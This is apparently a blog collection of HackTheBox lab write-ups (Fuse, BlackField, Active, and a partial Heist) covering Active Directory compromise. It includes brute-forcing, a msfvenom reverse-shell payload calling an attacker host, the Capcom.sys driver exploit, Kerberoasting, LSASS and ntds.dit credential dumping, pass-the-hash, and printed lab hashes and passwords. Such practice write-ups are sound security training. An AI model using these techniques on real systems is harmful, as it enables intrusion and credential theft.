Ikonw

HTB Fuse Writeup

image-20200907105043113

Author Ikonw

nmap

# Nmap 7.80 scan initiated Wed Sep  2 03:57:19 2020 as: nmap -Pn -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,49675,49676,49680,49698 -oN nmap/Full_10.10.10.193.nmap 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.0079s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-02 08:10:26Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/2%Time=5F4F506B%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m00s, deviation: 4h02m32s, median: 12m58s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-09-02T01:12:45-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-02T08:12:42
|_  start_date: 2020-09-02T08:04:25

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  2 04:01:52 2020 -- 1 IP address (1 host up) scanned in 273.40 seconds

We get the FQDN from the smb-os-discovery script

add it to the /etc/hosts

I like to enumerate smb ports first

┌──(root💀kali)-[~]
└─# enum4linux Fuse.fabricorp.local
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep  7 11:02:19 2020

However it didnt give me any critical information, anonymous login didnt get me anything too

┌──(root💀kali)-[~]
└─# smbclient -L 10.10.10.193                                                       
Enter WORKGROUP\root's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Start investigate the web, it’s a papercut CMS if im not wrong.

Found some user in each print logs

image-20200907111546993

We collect all the user

pmerton
tlavel
sthompson
bhult
administrator

According to previous box such as sauna.

The entry point most likely is to collect user and password from the web server and brute force on smb ports.

Therefore we use cewl to make a collection of password dictionary.

cewl -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm -m3 --with-numbers

Launch msfconsole use the smb_login module to bruteforce 

msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE user
USER_FILE => user
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE wordlist
PASS_FILE => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain fabricorp.local
smbdomain => fabricorp.local
msf5 auxiliary(scanner/smb/smb_login) > run

successfully got 2 creds

[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: 'fabricorp.local\tlavel:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: 'fabricorp.local\bhult:Fabricorp01'

Trying login to smb server, but was prompt with error which I never meet. Both account have the same problem

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U tlavel           
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
                                                                                                                   
┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbclient -L 10.10.10.193 -U bhult                                                                         
Enter WORKGROUP\bhult's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

After some google,find out I can use smbpasswd to change the password

image-20200907113508780

There seems some password policy, so I change the password to Fabricop011 for both accout

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/fuse]
└─# smbpasswd -r 10.10.10.193 -U tlavel                                                                        
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

After some enumeration on rpcclient and password $fab@s3Rv1ce$1

found some username 

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

and one password

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

and we try to login to windows using this credentials.

Went back to to msfconsole, we lanuch win_rm module to brute force the username against the password

and we got the creds svc-print:$fab@s3Rv1ce$1

use evil-winrm to login

┌──(root💀kali)-[/opt/evil-winrm]
└─# ./evil-winrm.rb -i 10.10.10.193 -u svc-print -p \$fab@s3Rv1ce\$1                                           1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> dir
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> dir


    Directory: C:\Users\svc-print


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         6/1/2020   1:45 AM                Desktop
d-r---        5/31/2020   5:20 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-print> cd Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/7/2020  12:35 AM             34 user.txt

Root

After getting root, check user’s privilege 

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

seLoadDrivePrivilege is enabled

Abusing SeLoadDriverPrivilege for privilege escalation

This site is a good reference for SeLoadDriverPrivilege escalation

EopLoaddriver

Capcom.sys

ExploitCapcom

open up the ExploitCapcom.cpp file, modify the Launch shell function. Change the commandLine[] targeted to a meterpreter.exe and compile it.

image-20200907191952261

Next we have to generate a meterpreter.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=1234 -f exe > meterpreter.exe

Create a folder called temp in C:\

and upload all the 4 files to the target server.

*Evil-WinRM* PS C:\temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: c000010e, WinError: 0
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000002841CC20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

And we got the meterpreter session on our multi handler




root

hackthebox
hackthebox medium
Continue
HTB BlackField Writeup

image-20200907210058092

Author: Ikonw

Nmap Scan:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 20:09 +08
Nmap scan report for 10.10.10.192
Host is up (0.0074s latency).

PORT     STATE    SERVICE       VERSION
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-07 19:09:38Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  filtered netbios-ssn
389/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds?
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-07T19:09:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.59 seconds


Launch smbmap login using anonymous account, found 2 files we can read

┌──(root💀kali)-[/opt/nmapAutomator]
└─# smbmap -H 10.10.10.192 -u anonymous                                                                                   2 ⨯
[+] Guest session       IP: 10.10.10.192:445    Name: 10.10.10.192                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

Access to profiles$

We found tons of user name, use along with awk command we collect the usernames

smbclient \\\\10.10.10.192\\profiles$ -c ls | awk '{print $1}' > user.lst

Launch the impacket tool GetNPUsers.py

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py BLACKFIELD.local/ -no-pass -usersfile user.lst | grep -v "not found"
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:d3f58a3eb5d36dc74f2c4a4335a5ce3e$06ce4ccf78e620d6e2e9994bd546f519cabec98dd1879365456bcee2081d7f0579d8e6b20d7b0e5750c533de72b48404ad38bf2241acc01cdf9e1868717cb01142ab131ebda7de2a0916a141ba5b1fd1b8e0895833ea57ce4b01cd93900eba7c4bab1e1a8dfcdb471486fedc1f731b5e65f38219e37883274350288d916e18f43359a170dd9aa3ef22d53c399378ed3467467211d6be448ee73983abe6cf7998725bfa70b7de45969715c15417af5249ebe9dd16332222f17101bbb1bdbfc2d32ac2bc319302911973a88a2b67fd425092e0f31329d04fd9eca106a97f2265185f6ae6c8ca8e747272dcad410bfbedac0275ed12
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

Save the hash and use john to crack it.

We got the creds support:#00^BlackKnight

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:16 DONE (2020-09-07 21:30) 0.06203g/s 889266p/s 889266c/s 889266C/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Try login using winrm port, but it failed.

Let’s go back to use new credentials to smb server

┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# smbmap -H 10.10.10.192 -u support -p "#00^BlackKnight"                                                                2 ⨯
[+] IP: 10.10.10.192:445        Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

Found nothing interesting

use rpcclient connect to rpc

rpcclient -U blackfield.local\\support 10.10.10.192
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
...........................

We got tons of user again.

After research, nothing special. But came along with a article using rpc to reset domain user password

Reset AD User password with Linux

Make a change to user audit2020 password to Ikonw123!

rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 Ikonw123!

Sadly, we still not able login using winrm but we can access audit2020‘s smb share again.

yeah smb share againnnn.

This time round, forensic folder is available to us

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbmap -H 10.10.10.192 -u audit2020 -p Ikonw123!
[+] IP: 10.10.10.192:445        Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 

┌──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap]
└─# smbclient \\\\10.10.10.192\\forensic -U audit2020                                      
Enter WORKGROUP\audit2020's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 21:03:16 2020
  ..                                  D        0  Sun Feb 23 21:03:16 2020
  commands_output                     D        0  Mon Feb 24 02:14:37 2020
  memory_analysis                     D        0  Fri May 29 04:28:33 2020
  tools                               D        0  Sun Feb 23 21:39:08 2020

                7846143 blocks of size 4096. 3978511 blocks available
smb: \>

Alright, it seems tons of files. Download the folder to local (If your internet connection is slow, you might also consider just mount the smb directory to local)

recurse ON
prompt OFF
mget *

A DMP file is a file that contains data “dumped” from a program’s memory space. It is often created when a program has an error or crashes and may also be saved by the program “Savedump.exe” on the first reboot after a crash. DMP files are usually named “Memory.dmp.”

pypykatz has the ability to parse the secrets hidden in the LSASS process, it is just something like mimikatz’s sekurlsa::

pypykatz lsa minidump lsass.DMP

and we actually got the password hash for user svc_backup

== MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        LM: NA
        NT: 9658d1d1dcd9250115e2205d9f48400d
        SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c

No need to bruteforce, we can directly pass the hash using evil-winrm

──(root💀kali)-[/opt/nmapAutomator/10.10.10.192/nmap/memory_analysis]
└─# evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Privilege escalation

After checking the user’s privileges, found out that SeBackupPrivilege is enabled.

SeBackupPrivilege
Description: This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file.

Firstly, I tried the vssadmin, well I don’t have the privilege

*Evil-WinRM* PS C:\Users> vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Error: You don't have the correct permissions to run this command.  Please run this utility from a command
window that has elevated administrator privileges.

Members of “Backup Operators” can logon locally on a Domain Controller and backup the NTDS.DIT, for ex. with: “wbadmin.exe” or “diskshadow.exe

As I read carefully, found out that diskshadow allow us to create a new shadow disk copy of the disk C and expose it as another driver

shadow_copy.txt

set context persistent nowriters
add volume c: alias ikonw
create
expose %ikonw% z:

However it has error 

-> set context persistent nowriter  <<--- shudnt it be nowriters?

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

        CLIENTACCESSIBLE        Specify to create shadow copies usable by client versions of Windows.
        PERSISTENT              Specify that shadow copy is persist across program exit, reset or reboot.
        PERSISTENT NOWRITERS    Specify that shadow copy is persistent and all writers are excluded.
        VOLATILE                Specify that shadow copy will be deleted on exit or reset.
        VOLATILE NOWRITERS      Specify that shadow copy is volatile and all writers are excluded.

        Example: SET CONTEXT CLIENTACCESSIBLE

Add extra character behind

set context persistent nowriterss
add volume c: alias ikonww
createe
expose %ikonw% z::

However one more error!!

The .cab metadata file cannot be stored in the current working directory, because it is read-only.

ermmm, maybe I am in the document directory

create a temp folder at C:\temp

Finally, we successfully create the shadow disk at Z: drive

*Evil-WinRM* PS C:\temp> diskshadow /s shadow_copy.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  9/8/2020 5:40:45 AM

-> set context persistent nowriters
-> add volume c: alias ikonw
-> create
Alias ikonw for shadow ID {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81} set as environment variable.

Querying all shadow copies with the shadow copy set ID {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81}

        * Shadow copy ID = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922}               %ikonw%
                - Shadow copy set: {115480f7-6f83-46ee-8ea6-4fcf8bcb1d81}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 9/8/2020 5:40:45 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %ikonw% z:
-> %ikonw% = {f3ecf98c-d3cb-4ffe-8dc8-b613d3ab5922}
The shadow copy was successfully exposed as z:\.
->

image-20200908134638982

The z: drive shadow folder permission also inherited from the C:, we dont have the permission to download the files.

After looking at the github page

  • If you want to read/copy data out of a “normally forbidden” folder, you have to act as a backup software. The shell copy command won’t work; you’ll need to open the source file manually using CreateFile making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

SeBackupPrivilegeCmdLets.dll

SeBackupPrivilegeUtils.dll

Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp> cd z:\windows\ntds
*Evil-WinRM* PS z:\windows\ntds> Copy-FileSeBackupPrivilege ntds.dit c:\temp\ntds.dit
*Evil-WinRM* PS z:\windows\ntds> cd c:\temp
*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/8/2020   5:40 AM            617 2020-09-08_5-40-45_DC01.cab
-a----         9/8/2020   5:52 AM       18874368 ntds.dit
-a----         9/8/2020   5:50 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----         9/8/2020   5:51 AM          16384 SeBackupPrivilegeUtils.dll
-a----         9/8/2020   5:40 AM             88 shadow_copy.txt

and we got the ntds.dit files. download to kali

and use secretsdump ,I just realize still need a extra system hive file.

reg save HKLM\SYSTEM c:\temp\system.hive
┌──(root💀kali)-[~/Desktop/hackthebox/Windows/blackfield]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile hash | more
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

and we got the administrator hash, use evil-winrm to login and we got root!




root

hackthebox
hackthebox hard
Continue
HTB Active Writeup

攻击机:官方Kali linux 2019 64位
作者:Ikonw

靶机介绍

在这里插入图片描述

一,端口扫描

这边我用的是我在OSCP时候用的一个脚本工具(懒惰)

nmapAutomator
在这里插入图片描述

./nmapAutomator.sh 10.10.10.100 Full
1

除了53和445并没有什么特别能交互的端口

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-10 18:56 +08
Nmap scan report for 10.10.10.100
Host is up (0.23s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-10 10:57:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 38s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-10T10:58:25
|_  start_date: 2020-02-10T08:17:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.25 seconds

12345678910111213141516171819202122232425262728293031323334353637383940414243444546

一,SMB ENUMERATION

首先 使用smbmap 来确定anonymous用户的权限(如果有写权限可以直接用impacket 来获取shell)

smbmap -H 10.10.10.100
1

发现对 Replication 文件夹 READ ONLY权限
在这里插入图片描述
(这里我本来想使用mount挂载smb, 但失败了。有成功的可以在评论告诉我。)

使用 smbclient进行连接 Replication

smbclient \\\\10.10.10.100\\Replication
1

发现两个有意思的文件夹

31B2F340-016D-11D2-945F-00C04FB984F9 是Default admin policy
6AC1786C-016F-11D2-945F-00C04fB984F9 是Default domain polices
12

在这里插入图片描述
如果没记错的话 windows server 2012以下的版本 会把密码储存在GPO。
经过一番查找
smb: \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups

在此目录发现Groups.xml

在这里插入图片描述
发现帐号和密码哈希值

帐号:active.htb\SVC_TGS
哈希值:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
12

可以使用kali自带的gpp-decrypt来破解密码

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
1

得到密码 GPPstillStandingStrong2k18
在这里插入图片描述
现在我们有了新的帐号 利用Smbmap确认我们是否有写的权限(拿shell)

smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
1

在这里插入图片描述
发现能读权限能读到user目录里的文件
可以用smbclient 进去拿user.txt

三,ROOT

之前看到 端口88 有 kerberos 在运行。尝试利用kerberoasing 攻击

Kerberoasing 攻击

利用 impacket-GetUserSPNs

/usr/bin/impacket-GetUserSPNs -request active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 

12

在这里插入图片描述
得到hash后 利用john the ripper进行破解
得到 Administrator密码为 Ticketmaster1968
在这里插入图片描述

取到帐号和密码后 我们可以使用 impacket psexec 进行登录

/usr/share/doc/python3-impacket/examples/psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
1

在这里插入图片描述

成功 拿到Administrator




root

hackthebox
hackthebox smb
Continue
HTB Heist Writeup

No.4-Heist-难度简单-HTB-walkthrough

攻击机:官方Kali linux 2019 64位
作者:Ikonw

靶机介绍

在这里插入图片描述

一,端口扫描

nmap -sV -sC heist.htb
1
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php                                                                                                                                                                                                         
135/tcp open  msrpc         Microsoft Windows RPC                                                                                                                                                                                          
445/tcp open  microsoft-ds?                                                                                                                                                                                                                
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                                                                                                                                                                                   
                                                                                                                                                                                                                                           
Host script results:                                                                                                                                                                                                                       
|_clock-skew: 4s                                                                                                                                                                                                                           
| smb2-security-mode:                                                                                                                                                                                                                      
|   2.02:                                                                                                                                                                                                                                  
|_    Message signing enabled but not required                                                                                                                                                                                             
| smb2-time:                                                                                                                                                                                                                               
|   date: 2020-01-25T01:23:05                                                                                                                                                                                                              
|_  start_date: N/A                                                                                                                                                                                                                        
1234567891011121314151617181920212223242526

二,HTTP Enumeration

进入web, 是个登陆页面。 并没有找到CMS, 右下角有个 Login as guest
在这里插入图片描述
发现这是个 类似于 Support desk 的平台。
在这里插入图片描述
点击 Attachment 跳转到 config.txt

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
